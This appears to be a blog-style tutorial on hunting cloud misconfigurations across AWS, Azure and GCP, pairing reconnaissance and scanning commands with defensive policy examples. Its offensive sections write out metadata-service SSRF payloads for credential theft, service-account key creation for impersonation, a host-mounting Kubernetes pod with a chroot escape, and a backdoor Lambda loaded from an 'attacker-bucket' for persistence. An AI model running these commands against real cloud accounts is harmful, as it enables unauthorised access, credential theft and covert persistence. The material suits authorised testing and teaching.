Cloud Security Misconfigurations: Hunting for AWS, Azure, and GCP Vulnerabilities

Hey there! It's been a wild ride lately with all the cloud security assessments I've been conducting, and I thought I'd share some real-world insights from the trenches. If you're like me, you've probably noticed that cloud misconfigurations have become the gift that keeps on giving during penetration tests. Seriously, I've seen million-dollar companies with S3 buckets so open you could practically see them from space.
Today, I'm breaking down cloud security misconfigurations across AWS, Azure, and GCP, from the absolute basics to the advanced stuff that even seasoned cloud security pros might miss. Whether you're just starting out or you've been hunting cloud vulnerabilities for years, I promise you'll find something useful here. Grab your favorite caffeinated beverage; you're going to need it!
TECHNICAL SUMMARY: This comprehensive guide progresses from basic cloud security concepts to advanced exploitation techniques. You'll learn how to identify, exploit, and remediate misconfigurations across major cloud platforms using both manual techniques and specialized tools like ScoutSuite, Prowler, and Pacu.
Understanding the Cloud Security Basics
When I first started working with cloud environments, I was honestly overwhelmed. If you're new to cloud security, don't worry, I've been there too.
What Are Cloud Misconfigurations Anyway?
Cloud misconfigurations are security settings that have been implemented incorrectly, leaving resources exposed to unauthorized access. Think of it like locking your front door but leaving all your windows wide open: technically you did something for security, but you missed the bigger picture.
Here's what makes cloud misconfigurations particularly dangerous:
Misconfiguration + Public Cloud = Publicly Accessible Vulnerability
I remember one of my first cloud assessments where a client was absolutely certain their AWS environment was secure. Within 30 minutes, I had access to their customer database through a misconfigured RDS instance. No fancy exploits, no zero-days, just a permission setting someone forgot to change.
The Shared Responsibility Model: It's Not All on AWS/Azure/GCP
The three major cloud providers, AWS, Azure, and GCP, all operate on a shared responsibility model. This means they secure the underlying infrastructure, but you are responsible for securing what you build on top of it. And that's where things often go wrong.
Why Cloud Misconfigurations Matter
Here's why these misconfigurations are so critical:
- They require no exploitation of code vulnerabilities
- They're incredibly common (even in security-conscious organizations)
- They can lead to catastrophic data breaches
- They're often simple to fix once identified
The Fundamental Security Concepts Across Cloud Providers
Before diving into specific platforms, let's understand the basic security principles that apply across all cloud environments:
- Identity and Access Management (IAM) - Controls who can access what
- Network Security - Manages what traffic can flow where
- Data Protection - Ensures sensitive information remains secure
- Logging and Monitoring - Helps detect suspicious activities
Now let's look at what these mean for each major cloud provider:
| Security Concept | AWS | Azure | GCP |
|---|---|---|---|
| Identity Management | IAM | Azure AD | Cloud IAM |
| Network Security | Security Groups, NACLs | Network Security Groups | VPC Firewall Rules |
| Data Protection | KMS, S3 Bucket Policies | Azure Key Vault | Cloud KMS |
| Logging | CloudTrail | Azure Monitor | Cloud Audit Logs |
Setting Up Your Testing Environment
Before we start poking around, let's set up a safe environment. Never test these techniques against production environments without explicit permission!
When I was starting out, these tools were absolute lifesavers:
For AWS:
# Install AWS CLI
pip install awscli
# Configure with limited permissions test account
aws configure
For Azure:
# Install Azure CLI
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
# Login with test account
az login
For GCP:
# Install Google Cloud SDK
curl https://sdk.cloud.google.com | bash
# Initialize with test account
gcloud init
QUICK REFERENCE: Always use dedicated testing accounts with scoped permissions. Never use production credentials for security testing.
Your First Cloud Security Assessment Tools
Don't worry about mastering everything at once. I started by simply learning how to list resources and check their permissions. Even this basic skill can uncover significant vulnerabilities.
- AWS CLI and Azure CLI - The command-line interfaces for basic reconnaissance
- AWS Config - For checking resource configurations
- Azure Security Center - For security recommendations
- Google Security Command Center - For GCP security insights
Essential Technical Skills for Cloud Security Testing
Now that we understand the fundamentals, let's get our hands dirty with some practical skills.
Manual Discovery Techniques
Let's start with manual discovery. I always begin here because it helps me understand the environment better than any automated tool.
Your First AWS Assessment
Let's start with AWS, which in my experience has the steepest learning curve but offers the most comprehensive tooling for security assessments.
For AWS S3 buckets, I often use simple DNS enumeration:
# Replace company-name with your target
for prefix in dev test staging prod backup data; do
host $prefix.company-name.s3.amazonaws.com
done
If the name resolves, the bucket may exist. One caveat: S3 uses wildcard DNS in many regions, so even nonexistent bucket names can resolve; treat DNS as a first pass, not proof.
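To actually confirm, I follow the DNS pass with an unauthenticated HTTP request (hypothetical bucket name below); the status code is what matters:
# 404 = no such bucket; 403 = bucket exists but access denied; 200 = listable
curl -s -o /dev/null -w "%{http_code}\n" https://dev.company-name.s3.amazonaws.com/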
Using AWS CLI for Basic Reconnaissance
I always start with these commands to get a lay of the land:
# List all S3 buckets
aws s3 ls
# Check for public S3 buckets (this won't catch everything)
aws s3api list-buckets --query "Buckets[].Name" --output text | xargs -I {} aws s3api get-bucket-acl --bucket {} --query "Grants[?Grantee.URI=='http://acs.amazonaws.com/groups/global/AllUsers']"
# List IAM users
aws iam list-users
# List EC2 instances
aws ec2 describe-instances --query "Reservations[].Instances[].[InstanceId, State.Name, SecurityGroups[].GroupName]"
Don't expect to understand everything immediately. When I first ran these commands, I spent hours googling the output to understand what I was seeing!
Common AWS Misconfigurations to Look For
In my penetration testing experience, these are the AWS issues I consistently find:
- Public S3 buckets - Still amazingly common
- Overly permissive IAM roles - The "AdminAccess" policy attached to everything
- Security groups allowing traffic from 0.0.0.0/0 - Because who doesn't love the whole internet accessing your resources? (see the quick check after this list)
- Unencrypted EBS volumes - Especially those containing sensitive data
- Public RDS instances - Database exposure is more common than you'd think
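Here's the quick 0.0.0.0/0 check I promised; the ip-permission.cidr filter is standard AWS CLI, and the query just picks the columns I care about:
# List security groups with at least one rule open to the whole internet
aws ec2 describe-security-groups \
--filters Name=ip-permission.cidr,Values=0.0.0.0/0 \
--query "SecurityGroups[].[GroupId,GroupName]" \
--output table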
Essential Azure Security Assessment
Next up is Azure, which has a different security model but similar principles.
Azure CLI Reconnaissance
These commands will get you started:
# List resource groups
az group list --output table
# List storage accounts (Azure's equivalent to S3)
az storage account list --output table
# Check for publicly accessible storage
az storage account list --query "[].{Name:name, Public:allowBlobPublicAccess}" --output table
# List VMs
az vm list --output table
Common Azure Misconfigurations
From my Azure assessments, I frequently encounter:
- Public storage containers - Similar to public S3 buckets
- Excessive role assignments - Often more permissions than necessary
- Network Security Groups with overly permissive rules - 0.0.0.0/0 strikes again (see the sketch after this list)
- Unencrypted storage accounts - Especially those with sensitive data
- Missing diagnostic settings - Making incident response nearly impossible
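For that NSG item, here's a minimal sketch that flags inbound rules open to any source; the JMESPath query is my own convention, so adapt it to your reporting needs:
# Flag NSG rules whose source is any address
az network nsg list --query "[].{NSG:name, OpenRules:securityRules[?sourceAddressPrefix=='*' || sourceAddressPrefix=='0.0.0.0/0'].name}" --output json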
GCP Security Basics
Finally, let's look at Google Cloud Platform:
GCP CLI Reconnaissance
# List projects
gcloud projects list
# List storage buckets (GCP's equivalent to S3)
gsutil ls
# List Compute Engine instances
gcloud compute instances list
# Check IAM policies
gcloud projects get-iam-policy YOUR_PROJECT_ID
Common GCP Misconfigurations
In my GCP assessments, I commonly find:
- Public Cloud Storage buckets - A recurring theme across cloud providers (see the one-liner after this list)
- Overly permissive IAM roles - Especially the Editor and Owner roles
- Default service account with excessive permissions - An easy oversight
- Compute instances with public IPs - Often unnecessary exposure
- Missing VPC Service Controls - Leading to potential data exfiltration
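For the public-bucket item, here's the one-liner I use to inspect a specific bucket (hypothetical name) for public principals:
# allUsers or allAuthenticatedUsers in the policy means the bucket is public
gsutil iam get gs://company-backups | grep -E "allUsers|allAuthenticatedUsers"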
Automation: Your First Security Scan with ScoutSuite
When I'm in a time crunch, ScoutSuite is my go-to tool for quick assessments across all three major clouds. Here's how to use it:
# Install ScoutSuite if you haven't already
pip install scoutsuite
# For AWS
scout aws
# For Azure (requires additional setup)
scout azure --cli
# For GCP
scout gcp --user-account
The tool will create an HTML report showing security issues across your environment. I remember being shocked the first time I ran this against a client's environment; it found 87 critical issues in what they thought was a secure setup!
Intermediate Cloud Security Hunting
Now we're getting to the good stuff. At this level, we're looking for more subtle misconfigurations and chaining issues together.
Beyond the Basic Scan: Defensive Evasion and Deeper Discovery
When I'm conducting a real-world assessment, basic scans only tell part of the story. Let's look at how to dig deeper:
Advanced AWS Hunting
I've found these techniques particularly effective:
# Find EC2 instances with attached IAM roles (potential privilege escalation paths)
aws ec2 describe-instances --query "Reservations[].Instances[].[InstanceId, IamInstanceProfile.Arn]" --output text
# Identify Lambda functions with environment variables (potential secrets)
aws lambda list-functions --query "Functions[].[FunctionName, Environment.Variables]"
# Look for cross-account access
aws iam list-roles --query "Roles[?AssumeRolePolicyDocument.Statement[].Principal.AWS && AssumeRolePolicyDocument.Statement[].Principal.AWS != 'arn:aws:iam::ACCOUNT_ID:root']"
Enter Prowler: AWS Security Assessment on Steroids
Prowler is my go-to tool for AWS security assessments. It performs hundreds of checks based on AWS security best practices:
# Clone and install Prowler
git clone https://github.com/prowler-cloud/prowler
cd prowler
pip install -r requirements.txt
# Run all checks
./prowler -M csv,json -D prowler-output
Let's analyze a valuable check for S3 encryption:
# Check for unencrypted S3 buckets
./prowler -c extra759
Here's what the output might show:
[!] Finding: s3-bucket-no-default-encryption: Bucket company-backups does not have default encryption enabled
I like to look at Prowler's "extra" checks, which often find subtle issues:
./prowler -c extra725
This checks for internal services exposed to the internet, a goldmine for penetration testers.
Privilege Escalation Techniques in AWS
One of my favorite techniques is looking for privilege escalation paths:
- Check for iam:PassRole permissions combined with services that can create resources
- Look for resource policies that allow cross-account access
- Hunt for Lambda functions that could be exploited to run code with their permissions
Let me walk you through a real scenario I encountered:
I found a Lambda function with an IAM role that had iam:PassRole permission. The function also had a misconfigured API Gateway that allowed me to trigger it with arbitrary input. By triggering the function with crafted input, I could make it create a new EC2 instance with an administrative role attached, instant privilege escalation!
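The underlying primitive looks roughly like this (the AMI ID and instance profile name are hypothetical); iam:PassRole plus ec2:RunInstances is the whole trick:
# Launch an instance wearing an admin role we're allowed to pass
aws ec2 run-instances \
--image-id ami-12345678 \
--instance-type t2.micro \
--iam-instance-profile Name=admin-instance-profile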
Exploiting S3 Misconfigurations: A Practical Example
When I find a misconfigured S3 bucket, I first check if I can list objects:
aws s3 ls s3://company-backups/ --no-sign-request
If successful, I might see:
2023-01-01 12:34:56 1234567 customer-database-backup.sql
2023-01-02 12:34:56 2345678 production-environment-variables.sh
Jackpot! Now I can download these:
aws s3 cp s3://company-backups/customer-database-backup.sql . --no-sign-request
COMMON PITFALL: Many security professionals check only for public read access but forget to check for public write access, which can be just as dangerous (think: uploading malicious files).
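Here's the harmless write test I run for exactly that case (hypothetical bucket name; clean up your marker file afterward):
# If this succeeds, anyone on the internet can upload to the bucket
echo "write test" > poc.txt
aws s3 cp poc.txt s3://company-backups/poc.txt --no-sign-request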
Azure Advanced Techniques
For Azure environments, try these approaches:
# Find resources with managed identities
az resource list --query "[?identity]"
# Check for custom role definitions (often overly permissive)
az role definition list --custom-role-only true --output table
# Look for automation accounts (often have powerful credentials)
az automation account list --output table
Azure Attack Paths
In Azure, I often look for these attack vectors:
- Managed identities with excessive permissions
- Custom RBAC roles with dangerous combinations of permissions
- Automation accounts with runbooks that can be modified
- Contributor access on resource groups containing Key Vaults
GCP Advanced Hunting
For GCP, these techniques yield interesting results:
# Find service accounts and their roles
gcloud iam service-accounts list --format="table(email,displayName)"
gcloud projects get-iam-policy YOUR_PROJECT_ID --format="table(bindings.role,bindings.members)" --flatten="bindings[].members"
# Look for custom organization policies (or lack thereof)
gcloud resource-manager org-policies list --organization=YOUR_ORG_ID
# Check for custom roles
gcloud iam roles list --project=YOUR_PROJECT_ID
Enter Pacu: AWS Exploitation Framework
For AWS specifically, Pacu is an incredible tool for security testing:
# Install Pacu
pip install pacu
# Basic usage
pacu
> import_keys default
> run iam__enum_users_roles_policies_groups
> run s3__enum
When I get my hands on AWS credentials, I immediately check what I can do with them using Pacu:
# Run the privilege escalation scanner to find escalation paths
run iam__privesc_scan
Pacu modules can chain together vulnerabilities in fascinating ways. I once used Pacu to:
- Enumerate S3 buckets
- Find a bucket with deployment scripts
- Discover AWS keys in those scripts
- Use those keys to pivot to production environments
The whole process took about 20 minutes, a stark reminder of how quickly misconfigurations can escalate.
Leveraging Cloud Metadata Services
One of my favorite techniques involves leveraging SSRF vulnerabilities to access cloud metadata services. In AWS EC2:
# If you can trigger an SSRF, point it to:
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Then target the role name returned:
http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
This often returns temporary credentials you can use to pivot. One caveat: instances enforcing IMDSv2 require a session token fetched via a PUT request first, which blocks the simplest SSRF payloads, so this works best against instances still allowing IMDSv1.
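Azure and GCP expose equivalent metadata endpoints, though both demand a custom header, which already rules out many basic SSRF vectors:
# Azure: request a management-plane token from the instance metadata service
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# GCP: request an access token for the instance's default service account
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"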
Advanced Cloud Security Testing
At this level, we're looking at sophisticated attack patterns that combine multiple misconfigurations.
Complex Attack Chains and Lateral Movement
The most devastating cloud attacks rarely exploit a single vulnerability; they chain multiple issues together.
AWS Example: The S3-Lambda-IAM Chain
I once encountered this attack chain:
- Found an S3 bucket with public write access
- Discovered the bucket triggered a Lambda function on new files
- Uploaded a crafted file that caused the Lambda to execute unexpected code
- Lambda had an attached role with administrative permissions
- Game over for that AWS account
The technical implementation looked something like:
# Upload a malicious file to the public bucket
aws s3 cp malicious_file.txt s3://vulnerable-bucket/
# The Lambda processes the file and executes our command
# We can extract credentials from the Lambda's environment
# Use those credentials to pivot
aws configure --profile stolen
aws iam get-user --profile stolen
Azure Attack Chain: Storage Account to Virtual Machine
In Azure, I've executed this chain:
- Found a publicly accessible storage account with SAS tokens in a config file
- Used the SAS token to access private blobs
- Found VM backup data containing credentials
- Used those credentials to access VMs in the environment
# Access the public storage account
az storage blob list --account-name vulnerable-account --container-name public-container
# Download files using discovered SAS token
az storage blob download --account-name vulnerable-account --container-name private-container --name config.json --sas-token "?sv=2020..."
# Use extracted credentials to access VMs
ssh admin@target-vm -i discovered_key.pem
GCP Attack Path: Service Account Impersonation
In GCP, this chain proved effective:
- Found a service account key in Cloud Storage
- The service account had iam.serviceAccounts.actAs permission
- Used the service account to impersonate other service accounts
- Eventually gained access to a service account with Editor role
# Authenticate as the discovered service account
gcloud auth activate-service-account --key-file discovered-key.json
# List service accounts we can impersonate
gcloud iam service-accounts list
# Grant ourselves key-creation rights on a target service account
gcloud iam service-accounts add-iam-policy-binding target-sa@project.iam.gserviceaccount.com --member serviceAccount:compromised-sa@project.iam.gserviceaccount.com --role roles/iam.serviceAccountKeyAdmin
# Get credentials for the target account
gcloud iam service-accounts keys create key.json --iam-account target-sa@project.iam.gserviceaccount.com
# Authenticate as the target account
gcloud auth activate-service-account --key-file key.json
Kubernetes API Server Exposure
If you find a misconfigured Kubernetes cluster in any cloud:
# Check if the K8s API server is exposed
curl -k https://<cluster-ip>:6443/api/v1/namespaces
# If anonymous access is enabled, you might get a valid response
I can then try to create pods with host mounts to escalate to node access:
apiVersion: v1
kind: Pod
metadata:
  name: attack-pod
spec:
  containers:
  - name: attack-container
    image: ubuntu
    command: ["sleep", "3600"]
    volumeMounts:
    - mountPath: /host
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
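If the pod schedules, node-level access is one chroot away:
# Exec into the pod and pivot into the node's root filesystem
kubectl exec -it attack-pod -- chroot /host /bin/bash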
CloudGoat and CloudSploit: Training and Detection
To practice these techniques safely:
- Set up CloudGoat (AWS vulnerable-by-design environment)
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
./cloudgoat.py create iam_privesc_by_attachment
- Use CloudSploit for automated detection
git clone https://github.com/cloudsploit/scans.git
cd scans
npm install
./index.js --cloud aws
Cross-Service Attacks
The real power comes from chaining vulnerabilities across services. For example:
- Find an EC2 with an attached role with S3 read permissions
- Access S3 buckets containing cloud formation templates
- Extract hardcoded credentials from templates (see the sketch after this list)
- Use those credentials to access RDS databases
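For that credential-extraction step, a rough sketch (the bucket name is hypothetical); the AKIA pattern matches AWS access key IDs:
# Pull the templates using the instance's role, then grep for embedded secrets
aws s3 sync s3://cfn-templates ./templates
grep -riE "password|secret|AKIA[A-Z0-9]{16}" ./templates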
Expert Cloud Security Insights
At this level, we're looking at cutting-edge techniques and subtle misconfigurations that even experienced cloud security professionals might miss.
The Art of Cloud Privilege Escalation
Privilege escalation in cloud environments is an art form, combining deep knowledge of services and permissions models.
AWS: The Subtle Dangers of Resource-Based Policies
I've found that resource-based policies often contain unexpected permission combinations:
# Find KMS keys with wildcard principals in their policies
aws kms list-keys --query 'Keys[*].KeyId' --output text | xargs -I {} aws kms get-key-policy --key-id {} --policy-name default --output text | grep -iE '"Principal"|"Action"|"Resource"|"Effect"' | grep '"\*"'
# Look for policies with NotAction (often overlooked); a loop avoids nesting {} inside $()
aws iam list-policies --scope Local --query 'Policies[*].Arn' --output text | tr '\t' '\n' | while read -r arn; do
version=$(aws iam get-policy --policy-arn "$arn" --query 'Policy.DefaultVersionId' --output text)
aws iam get-policy-version --policy-arn "$arn" --version-id "$version" --query 'PolicyVersion.Document' | grep -i NotAction
done
The most sophisticated AWS privilege escalation paths I've found involve:
- Service role trust relationships: Where cross-service confused deputy issues arise
- Resource policy wildcards: Particularly in KMS, SNS, SQS, and Lambda
- Chained permission boundaries: Where multiple policies must be analyzed together
Here's a real-world example I encountered: A Lambda function had a resource policy allowing a seemingly harmless service to invoke it. However, that service could be configured to pass arbitrary data to the Lambda. Combined with code that evaluated that data as commands, this created a remote code execution path that was extremely difficult to detect.
Azure: Managed Identity Manipulation
The most sophisticated Azure attacks often involve managed identities:
# Find user-assigned managed identities
az identity list --query "[].{Name:name, PrincipalId:principalId, ClientId:clientId, ResourceGroup:resourceGroup}" --output table
# Check what resources are using these identities
az resource list --query "[?identity].{Name:name, Type:type, ManagedIdentity:identity.principalId}" --output table
I've found that organizations often create managed identities with excessive permissions "just to make things work," not realizing they're creating significant privilege escalation paths.
One client had a web app with a managed identity that had Contributor rights to a resource group containing Azure Key Vault. By exploiting a simple XSS vulnerability in the web app, I could use the managed identity to access secrets in Key Vault, combining application security with cloud misconfiguration.
GCP: Service Account Key Management
In GCP, service account key management is often the weakest link:
# List service accounts with keys
gcloud iam service-accounts keys list --iam-account=TARGET_SERVICE_ACCOUNT@PROJECT_ID.iam.gserviceaccount.com
# Check if service account impersonation is possible
gcloud projects get-iam-policy PROJECT_ID --flatten="bindings[].members" \
--filter="bindings.members:SERVICE_ACCOUNT_EMAIL AND bindings.role:roles/iam.serviceAccountTokenCreator" \
--format="table(bindings.role, bindings.members)"
I've found organizations that rotate service account keys but don't actually revoke the old ones, leading to a situation where compromised keys remain valid indefinitely.
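Rotation without revocation is just key accumulation. Actually revoking the old key is one command:
# Delete the superseded key once the new one is in use
gcloud iam service-accounts keys delete KEY_ID \
--iam-account=TARGET_SERVICE_ACCOUNT@PROJECT_ID.iam.gserviceaccount.com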
Zero-Day Hunting in Cloud Services
At this level, you're looking for novel vulnerabilities. My approach:
- Study API interactions using AWS CloudTrail, Azure Activity Logs, or GCP Cloud Audit Logs
- Look for race conditions in resource provisioning
- Test for logic flaws in IAM evaluation
- Analyze how metadata services validate requests
- Explore container escape techniques in managed services
Advanced Persistence Techniques
Once you have access, maintaining it requires subtlety:
# Create backdoor AWS Lambda with minimal logging
aws lambda create-function \
--function-name "monitoring-service" \
--runtime python3.9 \
--role arn:aws:iam::account-id:role/service-role/minimal-logging-role \
--handler lambda_function.lambda_handler \
--code S3Bucket=attacker-bucket,S3Key=backdoor.zip
The most efficient backdoors use legitimate services in unexpected ways:
- CloudWatch Events to trigger actions on schedule (sketched after this list)
- Lambda layers to hide malicious code
- IAM policy versions to maintain access
- S3 event notifications for command and control
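Here's what that scheduled-trigger variant looks like in practice; the rule name, region, account ID, and function name are all hypothetical:
# Create an innocuous-looking scheduled rule...
aws events put-rule --name "maintenance-check" --schedule-expression "rate(1 hour)"
# ...and point it at the backdoor Lambda
aws events put-targets --rule maintenance-check \
--targets "Id"="1","Arn"="arn:aws:lambda:us-east-1:123456789012:function:monitoring-service"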
Custom Tools and Techniques
At this level, standard tools don't always cut it. I've developed custom scripts for specific scenarios:
# Simple AWS cross-account access checker
import boto3

def check_assume_role_policy(role_name):
    iam = boto3.client('iam')
    # The current account ID, used to spot principals from other accounts
    account_id = boto3.client('sts').get_caller_identity()['Account']
    try:
        role = iam.get_role(RoleName=role_name)
        # boto3 returns the trust policy as an already-parsed dict
        policy = role['Role']['AssumeRolePolicyDocument']
        for statement in policy['Statement']:
            if statement['Effect'] == 'Allow' and 'AWS' in statement.get('Principal', {}):
                principals = statement['Principal']['AWS']
                if isinstance(principals, str):
                    principals = [principals]
                for principal in principals:
                    if not principal.startswith(f'arn:aws:iam::{account_id}'):
                        print(f"WARNING: Role {role_name} can be assumed by external account: {principal}")
    except Exception as e:
        print(f"Error checking role {role_name}: {e}")
More sophisticated AWS analysis script:
import boto3

def check_cross_account_access():
    """Check for potential cross-account access issues"""
    iam = boto3.client('iam')
    # Get all roles (paginate in a real assessment)
    roles = iam.list_roles()['Roles']
    for role in roles:
        policy_document = role['AssumeRolePolicyDocument']
        # Look for cross-account trust relationships
        for statement in policy_document['Statement']:
            if 'AWS' in statement.get('Principal', {}):
                principal = statement['Principal']['AWS']
                # Handle both string and list principals
                principals = [principal] if isinstance(principal, str) else principal
                for p in principals:
                    if 'arn:aws:iam::' in p and not p.endswith(':root') and ':role/' not in p:
                        print(f"Potential issue: Role {role['RoleName']} trusts external principal {p}")

if __name__ == "__main__":
    check_cross_account_access()
Custom Azure security assessment script:
from azure.identity import DefaultAzureCredential
from azure.mgmt.authorization import AuthorizationManagementClient
import re

def check_custom_role_permissions():
    """Check for dangerous permissions in custom roles"""
    credential = DefaultAzureCredential()
    subscription_id = "YOUR_SUBSCRIPTION_ID"
    auth_client = AuthorizationManagementClient(credential, subscription_id)
    # Get all role definitions at subscription scope
    roles = auth_client.role_definitions.list(scope=f"/subscriptions/{subscription_id}")
    dangerous_actions = ["Microsoft.Authorization/*/write", "Microsoft.Network/networkSecurityGroups/write"]
    for role in roles:
        if role.role_type == "CustomRole":
            for permission in role.permissions:
                for action in permission.actions:
                    for dangerous in dangerous_actions:
                        # Turn the wildcard pattern into a regex before matching
                        if re.match(dangerous.replace("*", ".*"), action):
                            print(f"Dangerous permission {action} found in custom role {role.role_name}")

if __name__ == "__main__":
    check_custom_role_permissions()
Multi-Cloud Attack Paths
The real complexity emerges in multi-cloud environments. I've seen cases where:
- A misconfigured Azure AD allowed access to federated AWS accounts
- AWS temporary credentials were stored in GCP secrets
- GCP service accounts had overly permissive roles
Each environment by itself seemed secure, but the combination created an attack path.
Decision Tree for Cloud Exploitation
Here's my decision flow when conducting advanced cloud assessments:
- Identify authentication boundaries
- Map trust relationships between services
- Locate potential privilege escalation paths
- Identify data storage locations
- Target monitoring/logging infrastructure
- Attempt to bypass network controls
Defending the Cloud: The Security Engineer's Perspective
As someone who works on both sides of the security fence, I've developed some key insights for defending cloud environments:
AWS Security Best Practices from the Trenches
After finding hundreds of AWS misconfigurations, here's what actually works:
- Use AWS Organizations with Service Control Policies (SCPs) to enforce guardrails across all accounts
- Implement the principle of least privilege using Permission Boundaries
- Enable GuardDuty, AWS Config, and CloudTrail in all accounts and regions
- Use VPC Endpoints to keep traffic private
- Implement a strong tagging strategy for visibility and governance
The most effective defense I've seen is a "default deny" approach using SCPs:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyDisablingS3PublicAccessBlock",
      "Effect": "Deny",
      "Action": [
        "s3:PutAccountPublicAccessBlock",
        "s3:PutBucketPublicAccessBlock"
      ],
      "Resource": "*"
    }
  ]
}
With Block Public Access enabled on every account, this SCP stops anyone in the organization from switching it back off, which in practice prevents public S3 buckets regardless of IAM permissions.
Azure Defense in Depth
For Azure environments, I recommend:
- Use Azure Policy to enforce security standards
- Implement Privileged Identity Management (PIM) for just-in-time admin access
- Deploy Microsoft Defender for Cloud across all subscriptions
- Use Private Link for secure service connections
- Implement Azure Active Directory Conditional Access for identity protection
Here's an example of an effective Azure Policy that prevents public storage accounts:
{
  "properties": {
    "displayName": "Storage accounts should prohibit public access",
    "policyType": "BuiltIn",
    "mode": "Indexed",
    "parameters": {},
    "policyRule": {
      "if": {
        "allOf": [
          {
            "field": "type",
            "equals": "Microsoft.Storage/storageAccounts"
          },
          {
            "field": "Microsoft.Storage/storageAccounts/allowBlobPublicAccess",
            "equals": "true"
          }
        ]
      },
      "then": {
        "effect": "deny"
      }
    }
  }
}
GCP Security Controls
For GCP, these controls have proven most effective:
- Implement Organization Policy Constraints to enforce security standards
- Use VPC Service Controls to create security perimeters
- Deploy Security Command Center Premium for threat detection
- Implement Custom Roles with least privilege
- Use Cloud Asset Inventory for continuous discovery and assessment
Let me show you a practical example of implementing an Organization Policy constraint to prevent public Cloud Storage buckets:
gcloud resource-manager org-policies set-policy --organization=ORGANIZATION_ID policy.yaml
Where policy.yaml contains:
constraint: constraints/storage.publicAccessPrevention
booleanPolicy:
  enforced: true
This simple configuration ensures no one in your organization can create public buckets, a common source of data breaches I've seen repeatedly in assessments.
VPC Service Controls: Security Perimeters Done Right
One of my favorite GCP security features is VPC Service Controls. I've seen this single control prevent what would have otherwise been catastrophic data exfiltration scenarios.
# Create a perimeter around sensitive services
gcloud access-context-manager perimeters create PERIMETER_NAME \
--title="Production Data Perimeter" \
--resources=projects/PROJECT_NUMBER \
--restricted-services=storage.googleapis.com,bigquery.googleapis.com
A real example I encountered: a client had sensitive medical data in BigQuery that researchers needed to query. Rather than allowing full access to the data, we implemented VPC Service Controls with an access level that only allowed connections from approved networks. This prevented data exfiltration while enabling legitimate research.
Custom IAM Roles: The Art of Least Privilege
GCP's predefined roles, particularly broad ones like Editor and Owner, often grant far more than a job function needs. I recommend creating custom roles for specific job functions:
# Create a custom role for storage management only
gcloud iam roles create storageManager --project=PROJECT_ID \
--title="Storage Manager" \
--description="Manage GCS buckets without delete permission" \
--permissions=storage.buckets.create,storage.buckets.get,storage.buckets.list,storage.buckets.update
This approach ensures your teams have exactly the permissions they need, nothing more, nothing less.
Near-Expert Cloud Security Testing
This is where we separate the cloud security professionals from the true cloud security masters. We're looking at subtle, complex vulnerabilities that require deep understanding of cloud architecture.
Advanced GCP Attack Scenarios
GCP Workload Identity Federation Exploitation
I recently discovered a fascinating attack path involving GCP's Workload Identity Federation:
# List workload identity pools
gcloud iam workload-identity-pools list --location=global
# Check workload identity pool providers
gcloud iam workload-identity-pools providers list \
--workload-identity-pool=POOL_ID \
--location=global
The vulnerability arose when a client configured Workload Identity Federation with GitHub Actions but used overly permissive attribute mappings. An attacker who could create a GitHub repository with a specific name could effectively impersonate the identity and gain access to GCP resources.
The fix involved tightening the attribute mapping:
gcloud iam workload-identity-pools providers update-oidc github-provider \
--workload-identity-pool=POOL_ID \
--location=global \
--attribute-mapping="google.subject=assertion.sub,attribute.repository=assertion.repository,attribute.repository_owner=assertion.repository_owner" \
--attribute-condition="attribute.repository_owner=='legitimate-org'"
GCP Organization Policy Bypass Techniques
Organization policies are powerful, but I've found several bypass techniques:
- Older API versions that don't enforce certain constraints
- Service account impersonation to a service account with org policy exemptions
- Resource hierarchy manipulation by creating projects under different folders
Here's a script to identify potential org policy bypasses:
from google.cloud import resourcemanager_v3
from google.cloud import orgpolicy_v2

def find_policy_bypasses(organization_id):
    client = resourcemanager_v3.ProjectsClient()
    policy_client = orgpolicy_v2.OrgPolicyClient()
    # List all projects in the organization
    parent = f"organizations/{organization_id}"
    projects = client.list_projects(request={"parent": parent})
    for project in projects:
        # Check for custom org policies at project level
        policies = policy_client.list_policies(request={"parent": project.name})
        for policy in policies:
            if policy.spec.rules:
                for rule in policy.spec.rules:
                    if hasattr(rule, 'allow_all') and rule.allow_all:
                        print(f"WARNING: Project {project.display_name} has an allow_all rule for {policy.name}")

if __name__ == "__main__":
    find_policy_bypasses("YOUR_ORGANIZATION_ID")
Multi-Cloud Security Challenges
Working across AWS, Azure, and GCP simultaneously creates unique security challenges I've had to solve for several clients.
Identity Federation and Access Management
The most complex multi-cloud vulnerabilities often involve identity federation:
import boto3

def check_cross_cloud_trust_relationships():
    # Check AWS trusted entities
    aws_iam = boto3.client('iam')
    roles = aws_iam.list_roles()['Roles']
    for role in roles:
        policy = role['AssumeRolePolicyDocument']
        for statement in policy['Statement']:
            if 'AWS' in statement.get('Principal', {}):
                principal = statement['Principal']['AWS']
                principals = [principal] if isinstance(principal, str) else principal
                for p in principals:
                    if 'arn:aws:iam::' in p and not p.endswith(':root'):
                        print(f"AWS role {role['RoleName']} trusts external principal {p}")
    # Check GCP service account external access and Azure federated identities
    # (e.g. via google-auth and azure-identity); implementation depends on your environment
Centralized Logging and Security Monitoring
One of the most effective defenses I've implemented for multi-cloud environments is centralized logging:
# Export GCP logs to a central SIEM
gcloud logging sinks create multi-cloud-logs storage.googleapis.com/central-security-logs \
--log-filter='severity>=WARNING'
# Similar configurations needed for AWS CloudTrail and Azure Activity Logs
The key is normalizing the log formats across providers, something I've accomplished using cloud functions that process and standardize logs before forwarding them to a SIEM like Splunk or Elastic.
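As a sketch of that normalization step (the field names follow CloudTrail, Azure Activity Log, and GCP audit log conventions, but treat the exact mapping as illustrative):
def normalize_event(provider, event):
    """Map provider-specific audit events onto a minimal common schema."""
    if provider == "aws":  # CloudTrail record
        return {"time": event["eventTime"], "actor": event["userIdentity"].get("arn"), "action": event["eventName"]}
    if provider == "azure":  # Activity Log entry
        return {"time": event["eventTimestamp"], "actor": event.get("caller"), "action": event["operationName"]}
    if provider == "gcp":  # Cloud Audit Log entry
        payload = event["protoPayload"]
        return {"time": event["timestamp"], "actor": payload["authenticationInfo"]["principalEmail"], "action": payload["methodName"]}
    raise ValueError(f"Unknown provider: {provider}")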
Emerging Cloud Security Threats
